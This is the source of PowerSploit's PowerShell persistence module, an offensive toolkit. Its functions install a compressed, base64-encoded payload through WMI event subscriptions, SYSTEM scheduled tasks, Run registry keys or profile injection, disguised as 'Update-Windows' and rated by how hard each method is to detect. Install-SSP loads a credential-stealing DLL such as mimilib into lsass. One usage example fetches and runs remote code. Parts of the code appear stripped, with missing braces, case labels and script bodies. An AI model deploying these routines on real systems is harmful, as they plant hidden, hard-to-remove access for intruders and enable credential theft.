
function New-ElevatedPersistenceOption

    Configure elevated persistence options for the Add-Persistence function.

    PowerSploit Function: New-ElevatedPersistenceOption
    Author: Matthew Graeber (@mattifestation)
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None

    New-ElevatedPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry.


    Persist via a permanent WMI event subscription. This option will be the most difficult to detect and remove.

    Detection Difficulty: Difficult
    Removal Difficulty: Difficult
    User Detectable? No

.PARAMETER ScheduledTask

    Persist via a scheduled task.

    Detection Difficulty: Moderate
    Removal Difficulty: Moderate
    User Detectable? No


    Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user.

    Detection Difficulty: Easy
    Removal Difficulty: Easy
    User Detectable? Yes


    Starts the payload upon any user logon.


    Starts the payload within 240 and 325 seconds of computer startup.


    Starts the payload after one minute of idling.


    Starts the payload daily.


    Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.


    C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'


    C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup


    C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle


    [CmdletBinding()] Param (
        [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]
        [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]

        [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
        [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]
        [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]

        [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]

        [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]
        [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]

        [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]
        [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]

        [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]

        [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]
        [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]

        [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]

    $PersistenceOptionsTable = @{
        Method = ''
        Trigger = ''
        Time = ''

    switch ($PSCmdlet.ParameterSetName)
            $PersistenceOptionsTable['Method'] = 'PermanentWMI'
            $PersistenceOptionsTable['Trigger'] = 'AtStartup'

            $PersistenceOptionsTable['Method'] = 'PermanentWMI'
            $PersistenceOptionsTable['Trigger'] = 'Daily'
            $PersistenceOptionsTable['Time'] = $At

            $PersistenceOptionsTable['Method'] = 'ScheduledTask'
            $PersistenceOptionsTable['Trigger'] = 'AtLogon'

            $PersistenceOptionsTable['Method'] = 'ScheduledTask'
            $PersistenceOptionsTable['Trigger'] = 'OnIdle'

            $PersistenceOptionsTable['Method'] = 'ScheduledTask'
            $PersistenceOptionsTable['Trigger'] = 'Daily'
            $PersistenceOptionsTable['Time'] = $At

            $PersistenceOptionsTable['Method'] = 'Registry'
            $PersistenceOptionsTable['Trigger'] = 'AtLogon'

    $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable
    $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.ElevatedPersistenceOption'

    Write-Output $PersistenceOptions

function New-UserPersistenceOption

    Configure user-level persistence options for the Add-Persistence function.

    PowerSploit Function: New-UserPersistenceOption
    Author: Matthew Graeber (@mattifestation)
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None

    New-UserPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry.

.PARAMETER ScheduledTask

    Persist via a scheduled task.

    Detection Difficulty: Moderate
    Removal Difficulty: Moderate
    User Detectable? No


    Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user.

    Detection Difficulty: Easy
    Removal Difficulty: Easy
    User Detectable? Yes


    Starts the payload upon any user logon.


    Starts the payload after one minute of idling.


    Starts the payload daily.


    Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.


    C:\PS> $UserOptions = New-UserPersistenceOption -Registry -AtLogon


    C:\PS> $UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle


    [CmdletBinding()] Param (
        [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
        [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]

        [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]

        [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]

        [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]

        [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]

        [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]

    $PersistenceOptionsTable = @{
        Method = ''
        Trigger = ''
        Time = ''

    switch ($PSCmdlet.ParameterSetName)
            $PersistenceOptionsTable['Method'] = 'ScheduledTask'
            $PersistenceOptionsTable['Trigger'] = 'AtLogon'

            $PersistenceOptionsTable['Method'] = 'ScheduledTask'
            $PersistenceOptionsTable['Trigger'] = 'OnIdle'

            $PersistenceOptionsTable['Method'] = 'ScheduledTask'
            $PersistenceOptionsTable['Trigger'] = 'Daily'
            $PersistenceOptionsTable['Time'] = $At

            $PersistenceOptionsTable['Method'] = 'Registry'
            $PersistenceOptionsTable['Trigger'] = 'AtLogon'

    $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable
    $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.UserPersistenceOption'

    Write-Output $PersistenceOptions

function Add-Persistence

    Add persistence capabilities to a script.

    PowerSploit Function: Add-Persistence
    Author: Matthew Graeber (@mattifestation)
    License: BSD 3-Clause
    Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption
    Optional Dependencies: None

    Add-Persistence will add persistence capabilities to any script or scriptblock. This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted.

.PARAMETER ScriptBlock

    Specifies a scriptblock containing your payload.


    Specifies the path to your payload.

.PARAMETER ElevatedPersistenceOption

    Specifies the trigger for the persistent payload if the target is running elevated.
    You must run New-ElevatedPersistenceOption to generate this argument.

.PARAMETER UserPersistenceOption

    Specifies the trigger for the persistent payload if the target is not running elevated.
    You must run New-UserPersistenceOption to generate this argument.

.PARAMETER PersistenceScriptName

    Specifies the name of the function that will wrap the original payload. The default value is 'Update-Windows'.

.PARAMETER DoNotPersistImmediately

    Output only the wrapper function for the original payload. By default, Add-Persistence will output a script that will automatically attempt to persist (e.g. it will end with 'Update-Windows -Persist'). If you are in a position where you are running in memory but want to persist at a later time, use this option.

.PARAMETER PersistentScriptFilePath

    Specifies the path where you would like to output the persistence script. By default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory.

.PARAMETER RemovalScriptFilePath

    Specifies the path where you would like to output a script that will remove the persistent payload. By default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory.


    Outputs the contents of the persistent script to the pipeline. This option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline.



    Add-Persistence cannot receive any input from the pipeline.



    If the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script.


    When the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine.


    C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
    C:\PS>$UserOptions = New-UserPersistenceOption -Registry -AtLogon
    C:\PS>Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose

    Creates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime.


    C:\PS>$Rickroll = { iex (iwr ) }
    C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
    C:\PS>$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
    C:\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1

    Creates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime. The output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement. The final, encoded output is finally saved to .\EncodedPersistentScript.ps1


    [CmdletBinding()] Param (
        [Parameter( Mandatory = $True, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )]

        [Parameter( Mandatory = $True, ParameterSetName = 'FilePath' )]

        [Parameter( Mandatory = $True )]

        [Parameter( Mandatory = $True )]

        $PersistenceScriptName = 'Update-Windows',

        $PersistentScriptFilePath = "$PWD\Persistence.ps1",

        $RemovalScriptFilePath = "$PWD\RemovePersistence.ps1",



    Set-StrictMode -Version 2

#region Validate arguments

    if ($ElevatedPersistenceOption.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.ElevatedPersistenceOption')
        throw 'You provided invalid elevated persistence options.'

    if ($UserPersistenceOption.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.UserPersistenceOption')
        throw 'You provided invalid user-level persistence options.'

    $Result = Get-Item $PersistentScriptFilePath -ErrorAction SilentlyContinue
    if ($Result -and $Result.PSIsContainer)
        throw 'You must provide a file name with the PersistentScriptFilePath option.'

    $Result = Get-Item $RemovalScriptFilePath -ErrorAction SilentlyContinue
    if ($Result -and $Result.PSIsContainer)
        throw 'You must provide a file name with the RemovalScriptFilePath option.'

    $PersistentPath = Split-Path $PersistentScriptFilePath -ErrorAction Stop
    $Leaf = Split-Path $PersistentScriptFilePath -Leaf -ErrorAction Stop
    $PersistentScriptFile = ''
    $RemovalScriptFile = ''

    if ($PersistentPath -eq '')
        # i.e. Only a file name was provided implying $PWD
        $PersistentScriptFile = "$($PWD)\$($Leaf)"
        $PersistentScriptFile = "$(Resolve-Path $PersistentPath)\$($Leaf)"

    $RemovalPath = Split-Path $RemovalScriptFilePath -ErrorAction Stop
    $Leaf = Split-Path $RemovalScriptFilePath -Leaf -ErrorAction Stop
    if ($RemovalPath -eq '')
        # i.e. Only a file name was provided implying $PWD
        $RemovalScriptFile = "$($PWD)\$($Leaf)"
        $RemovalScriptFile = "$(Resolve-Path $RemovalPath)\$($Leaf)"

    if ($PSBoundParameters['FilePath'])
        $null = Get-ChildItem $FilePath -ErrorAction Stop
        $Script = [IO.File]::ReadAllText((Resolve-Path $FilePath))
        $Script = $ScriptBlock


#region Initialize data

    $CompressedScript = ''
    $UserTrigger = ''
    $UserTriggerRemoval = ''
    $ElevatedTrigger = "''"
    $ElevatedTriggerRemoval = ''
    $UserTrigger = "''"
    $UserTriggerRemoval = ''
    $CommandLine = ''


#region Compress the original payload in preparation for the persistence script

    $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($Script)
    $CompressedStream = New-Object IO.MemoryStream
    $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
    $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
    $CompressedScriptBytes = $CompressedStream.ToArray()
    $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)

    # Generate the code that will decompress and execute the payload.
    # This code is intentionally ugly to save space.
    $NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'


#region Process persistence options

    # Begin processing elevated persistence options
    switch ($ElevatedPersistenceOption.Method)
            $ElevatedTriggerRemoval = {
Get-WmiObject __eventFilter -namespace root\subscription -filter "name='Updater'"| Remove-WmiObject
Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name='Updater'" | Remove-WmiObject
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object { $_.filter -match 'Updater'} | Remove-WmiObject

            switch ($ElevatedPersistenceOption.Trigger)
                    $ElevatedTrigger = "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=```"WQL```";Query=```"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325```"};```$Consumer=Set-WmiInstance -Namespace ```"root\subscription```" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```"```$(```$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive```";RunInteractively='false'};Set-WmiInstance -Namespace ```"root\subscription```" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`""

                    $ElevatedTrigger = "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=```"WQL```";Query=```"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $($ElevatedPersistenceOption.Time.ToString('HH')) AND TargetInstance.Minute = $($ElevatedPersistenceOption.Time.ToString('mm')) GROUP WITHIN 60```"};```$Consumer=Set-WmiInstance -Namespace ```"root\subscription```" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```"```$(```$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive```";RunInteractively='false'};Set-WmiInstance -Namespace ```"root\subscription```" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`""

                    throw 'Invalid elevated persistence options provided!'

            $CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"'
            $ElevatedTriggerRemoval = "schtasks /Delete /TN Updater"

            switch ($ElevatedPersistenceOption.Trigger)
                    $ElevatedTrigger = "schtasks /Create /RU system /SC ONLOGON /TN Updater /TR "
                    $ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR "

                    $ElevatedTrigger = "schtasks /Create /RU system /SC ONIDLE /I 1 /TN Updater /TR "

                    throw 'Invalid elevated persistence options provided!'

            $ElevatedTrigger = '"' + $ElevatedTrigger + $CommandLine + '"'

            $ElevatedTrigger = "New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater -PropertyType String -Value "
            $ElevatedTriggerRemoval = "Remove-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater"
            $CommandLine = "`"```"`$(`$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe```" -NonInteractive -WindowStyle Hidden`""
            $ElevatedTrigger = "'" + $ElevatedTrigger + $CommandLine + "'"

            throw 'Invalid elevated persistence options provided!'

    # Begin processing user-level persistence options
    switch ($UserPersistenceOption.Method)
            $CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"'
            $UserTriggerRemoval = "schtasks /Delete /TN Updater"

            switch ($UserPersistenceOption.Trigger)
                    $UserTrigger = "schtasks /Create /SC DAILY /ST $($UserPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR "

                    $UserTrigger = "schtasks /Create /SC ONIDLE /I 1 /TN Updater /TR "

                    throw 'Invalid user-level persistence options provided!'

            $UserTrigger = '"' + $UserTrigger + $CommandLine + '"'

            $UserTrigger = "New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater -PropertyType String -Value "
            $UserTriggerRemoval = "Remove-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater"
            $CommandLine = "`"```"`$(`$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe```" -NonInteractive -WindowStyle Hidden`""
            $UserTrigger = "'" + $UserTrigger + $CommandLine + "'"

            throw 'Invalid user-level persistence options provided!'


#region Original script with its persistence logic will reside here

# This is intentionally ugly in the interest of saving space on the victim machine.
$PersistantScript = {
mkdir (Split-Path -Parent $Prof)
(gc $Prof) + (' ' * 600 + $Script)|Out-File $Prof -Fo
iex $Payload|Out-Null
Write-Output $Payload}


    $PersistantScript = $PersistantScript.ToString().Replace('FUNCTIONNAME', $PersistenceScriptName)
    $PersistantScript = $PersistantScript.ToString().Replace('ORIGINALSCRIPT', $NewScript)
    $PersistantScript = $PersistantScript.ToString().Replace('ELEVATEDTRIGGER', $ElevatedTrigger)
    $PersistantScript = $PersistantScript.ToString().Replace('USERTRIGGER', $UserTrigger)

    if ($DoNotPersistImmediately)
        $PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', '')
        $PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', "$PersistenceScriptName -Persist")


#region Generate final output

# Generate the persistence removal script
$PersistenceRemoval = @"
# Execute the following to remove the elevated persistent payload
# Execute the following to remove the user-level persistent payload

    $PersistantScript | Out-File $PersistentScriptFile
    Write-Verbose "Persistence script written to $PersistentScriptFile"

    $PersistenceRemoval | Out-File $RemovalScriptFile
    Write-Verbose "Persistence removal script written to $RemovalScriptFile"

    if ($PassThru)
        # Output a scriptblock of the persistent function. This can be passed to Out-EncodedCommand via the pipeline.
        Write-Output ([ScriptBlock]::Create($PersistantScript))


function Install-SSP

Installs a security support provider (SSP) dll.

Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None


Install-SSP installs an SSP dll. Installation involves copying the dll to
%windir%\System32 and adding the name of the dll to
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages.


Specifies the path to the SSP dll you would like to install.


Install-SSP -Path .\mimilib.dll


The SSP dll must match the OS architecture. i.e. You must have a 64-bit SSP dll
if you are running a 64-bit OS. In order for the SSP dll to be loaded properly
into lsass, the dll must export SpLsaModeInitialize.

    [CmdletBinding()] Param (
        [ValidateScript({Test-Path (Resolve-Path $_)})]

    $Principal = [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()

    if(-not $Principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
        throw 'Installing an SSP dll requires administrative rights. Execute this script from an elevated PowerShell prompt.'

    # Resolve the full path if a relative path was provided.
    $FullDllPath = Resolve-Path $Path

    # Helper function used to determine the dll architecture
    function local:Get-PEArchitecture
            [Parameter( Position = 0,
                        Mandatory = $True )]
        # Parse PE header to see if binary was compiled 32 or 64-bit
        $FileStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read)
        [Byte[]] $MZHeader = New-Object Byte[](2)
        $FileStream.Read($MZHeader,0,2) | Out-Null
        $Header = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)
        if ($Header -ne 'MZ')
            Throw 'Invalid PE header.'
        # Seek to 0x3c - IMAGE_DOS_HEADER.e_lfanew (i.e. Offset to PE Header)
        $FileStream.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null
        [Byte[]] $lfanew = New-Object Byte[](4)
        # Read offset to the PE Header (will be read in reverse)
        $FileStream.Read($lfanew,0,4) | Out-Null
        $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | % { $_.ToString('X2') } ) -join ''))
        $FileStream.Seek($PEOffset + 4, [System.IO.SeekOrigin]::Begin) | Out-Null
        [Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2)
        # Read compiled architecture
        $FileStream.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null
        $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | % { $_.ToString('X2') } ) -join '')
        if (($Architecture -ne '014C') -and ($Architecture -ne '8664'))
            Throw 'Invalid PE header or unsupported architecture.'
        if ($Architecture -eq '014C')
            Write-Output '32-bit'
        elseif ($Architecture -eq '8664')
            Write-Output '64-bit'
            Write-Output 'Other'

    $DllArchitecture = Get-PEArchitecture $FullDllPath

    $OSArch = Get-WmiObject Win32_OperatingSystem | Select-Object -ExpandProperty OSArchitecture

    if ($DllArchitecture -ne $OSArch)
        throw 'The operating system architecture must match the architecture of the SSP dll.'

    $Dll = Get-Item $FullDllPath | Select-Object -ExpandProperty Name

    # Get the dll filename without the extension.
    # This will be added to the registry.
    $DllName = $Dll | % { % {($_ -split '\.')[0]} }

    # Enumerate all of the currently installed SSPs
    $SecurityPackages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' |
        Select-Object -ExpandProperty 'Security Packages'

    if ($SecurityPackages -contains $DllName)
        throw "'$DllName' is already present in HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages."

    # In case you're running 32-bit PowerShell on a 64-bit OS
    $NativeInstallDir = "$($Env:windir)\Sysnative"

    if (Test-Path $NativeInstallDir)
        $InstallDir = $NativeInstallDir
        $InstallDir = "$($Env:windir)\System32"

    if (Test-Path (Join-Path $InstallDir $Dll))
        throw "$Dll is already installed in $InstallDir."

    # If you've made it this far, you are clear to install the SSP dll.
    Copy-Item $FullDllPath $InstallDir

    $SecurityPackages += $DllName

    Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages

    $DynAssembly = New-Object System.Reflection.AssemblyName('SSPI2')
    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('SSPI2', $False)

    $TypeBuilder = $ModuleBuilder.DefineType('SSPI2.Secur32', 'Public, Class')
    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('AddSecurityPackage',
        'Public, Static',
        [Type[]] @([String], [IntPtr]),

    $Secur32 = $TypeBuilder.CreateType()

    if ([IntPtr]::Size -eq 4) {
        $StructSize = 20
    } else {
        $StructSize = 24

    $StructPtr = [Runtime.InteropServices.Marshal]::AllocHGlobal($StructSize)
    [Runtime.InteropServices.Marshal]::WriteInt32($StructPtr, $StructSize)

    $RuntimeSuccess = $True

    try {
        $Result = $Secur32::AddSecurityPackage($DllName, $StructPtr)
    } catch {
        $HResult = $Error[0].Exception.InnerException.HResult
        Write-Warning "Runtime loading of the SSP failed. (0x$($HResult.ToString('X8')))"
        Write-Warning "Reason: $(([ComponentModel.Win32Exception] $HResult).Message)"
        $RuntimeSuccess = $False

    if ($RuntimeSuccess) {
        Write-Verbose 'Installation and loading complete!'
    } else {
        Write-Verbose 'Installation complete! Reboot for changes to take effect.'

function Get-SecurityPackages

Enumerates all loaded security packages (SSPs).

Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None


Get-SecurityPackages is a wrapper for secur32!EnumerateSecurityPackages.
It also parses the returned SecPkgInfo struct array.



    [CmdletBinding()] Param()

    #region P/Invoke declarations for secur32.dll
    $DynAssembly = New-Object System.Reflection.AssemblyName('SSPI')
    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('SSPI', $False)

    $FlagsConstructor = [FlagsAttribute].GetConstructor(@())
    $FlagsCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($FlagsConstructor, @())
    $StructAttributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'

    $EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])
    $null = $EnumBuilder.DefineLiteral('INTEGRITY', 1)
    $null = $EnumBuilder.DefineLiteral('PRIVACY', 2)
    $null = $EnumBuilder.DefineLiteral('TOKEN_ONLY', 4)
    $null = $EnumBuilder.DefineLiteral('DATAGRAM', 8)
    $null = $EnumBuilder.DefineLiteral('CONNECTION', 0x10)
    $null = $EnumBuilder.DefineLiteral('MULTI_REQUIRED', 0x20)
    $null = $EnumBuilder.DefineLiteral('CLIENT_ONLY', 0x40)
    $null = $EnumBuilder.DefineLiteral('EXTENDED_ERROR', 0x80)
    $null = $EnumBuilder.DefineLiteral('IMPERSONATION', 0x100)
    $null = $EnumBuilder.DefineLiteral('ACCEPT_WIN32_NAME', 0x200)
    $null = $EnumBuilder.DefineLiteral('STREAM', 0x400)
    $null = $EnumBuilder.DefineLiteral('NEGOTIABLE', 0x800)
    $null = $EnumBuilder.DefineLiteral('GSS_COMPATIBLE', 0x1000)
    $null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)
    $null = $EnumBuilder.DefineLiteral('ASCII_BUFFERS', 0x4000)
    $null = $EnumBuilder.DefineLiteral('FRAGMENT', 0x8000)
    $null = $EnumBuilder.DefineLiteral('MUTUAL_AUTH', 0x10000)
    $null = $EnumBuilder.DefineLiteral('DELEGATION', 0x20000)
    $null = $EnumBuilder.DefineLiteral('READONLY_WITH_CHECKSUM', 0x40000)
    $null = $EnumBuilder.DefineLiteral('RESTRICTED_TOKENS', 0x80000)
    $null = $EnumBuilder.DefineLiteral('NEGO_EXTENDER', 0x100000)
    $null = $EnumBuilder.DefineLiteral('NEGOTIABLE2', 0x200000)
    $null = $EnumBuilder.DefineLiteral('APPCONTAINER_PASSTHROUGH', 0x400000)
    $null = $EnumBuilder.DefineLiteral('APPCONTAINER_CHECKS', 0x800000)
    $SECPKG_FLAG = $EnumBuilder.CreateType()

    $TypeBuilder = $ModuleBuilder.DefineType('SSPI.SecPkgInfo', $StructAttributes, [Object], [Reflection.Emit.PackingSize]::Size8)
    $null = $TypeBuilder.DefineField('fCapabilities', $SECPKG_FLAG, 'Public')
    $null = $TypeBuilder.DefineField('wVersion', [Int16], 'Public')
    $null = $TypeBuilder.DefineField('wRPCID', [Int16], 'Public')
    $null = $TypeBuilder.DefineField('cbMaxToken', [Int32], 'Public')
    $null = $TypeBuilder.DefineField('Name', [IntPtr], 'Public')
    $null = $TypeBuilder.DefineField('Comment', [IntPtr], 'Public')
    $SecPkgInfo = $TypeBuilder.CreateType()

    $TypeBuilder = $ModuleBuilder.DefineType('SSPI.Secur32', 'Public, Class')
    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('EnumerateSecurityPackages',
        'Public, Static',
        [Type[]] @([Int32].MakeByRefType(),

    $Secur32 = $TypeBuilder.CreateType()

    $PackageCount = 0
    $PackageArrayPtr = [IntPtr]::Zero
    $Result = $Secur32::EnumerateSecurityPackages([Ref] $PackageCount, [Ref] $PackageArrayPtr)

    if ($Result -ne 0)
        throw "Unable to enumerate seucrity packages. Error (0x$($Result.ToString('X8')))"

    if ($PackageCount -eq 0)
        Write-Verbose 'There are no installed security packages.'

    $StructAddress = $PackageArrayPtr

    foreach ($i in 1..$PackageCount)
        $SecPackageStruct = [Runtime.InteropServices.Marshal]::PtrToStructure($StructAddress, [Type] $SecPkgInfo)
        $StructAddress = [IntPtr] ($StructAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] $SecPkgInfo))

        $Name = $null

        if ($SecPackageStruct.Name -ne [IntPtr]::Zero)
            $Name = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($SecPackageStruct.Name)

        $Comment = $null

        if ($SecPackageStruct.Comment -ne [IntPtr]::Zero)
            $Comment = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($SecPackageStruct.Comment)

        $Attributes = @{
            Name = $Name
            Comment = $Comment
            Capabilities = $SecPackageStruct.fCapabilities
            MaxTokenSize = $SecPackageStruct.cbMaxToken

        $SecPackage = New-Object PSObject -Property $Attributes
        $SecPackage.PSObject.TypeNames[0] = 'SECUR32.SECPKGINFO'
